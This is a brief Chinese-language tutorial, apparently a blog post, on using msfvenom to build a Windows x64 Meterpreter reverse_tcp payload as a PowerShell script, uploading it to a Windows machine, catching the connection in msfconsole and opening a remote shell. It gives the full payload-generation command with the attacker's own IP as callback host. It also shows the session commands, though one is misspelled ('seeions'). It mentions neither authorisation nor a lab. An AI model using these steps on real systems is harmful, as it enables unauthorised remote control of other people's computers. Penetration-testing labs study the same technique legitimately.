一、使用工具kali linux,windows severe msfvenom msfconsole
二、使用msfvenom生成ps1格式的Powershell腳本
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXXXX(你自己kali本機IP) LPORT=XXXX(自己隨便設置) -f psh-reflection >xxx.ps1

將生成的Powershell腳本下載並上傳至windows機器中
三、啟動Msfconsole

選擇模塊

設置payload


設置完成后執行run
在windows機器中執行powershell腳本,此時攻擊機器中會顯示如果下結果

如果攻擊主機中顯示通道已經建立但是未拿到相應的shell 如圖:

回車進入:
msf exploit(handler)>

輸入:sessions -l 查看信息

輸入 seeions 1 就會拿到想要的meterpreter

在meterpreter中輸入shell 即可拿到相應的shell

后續可以操作 一些相關命令。
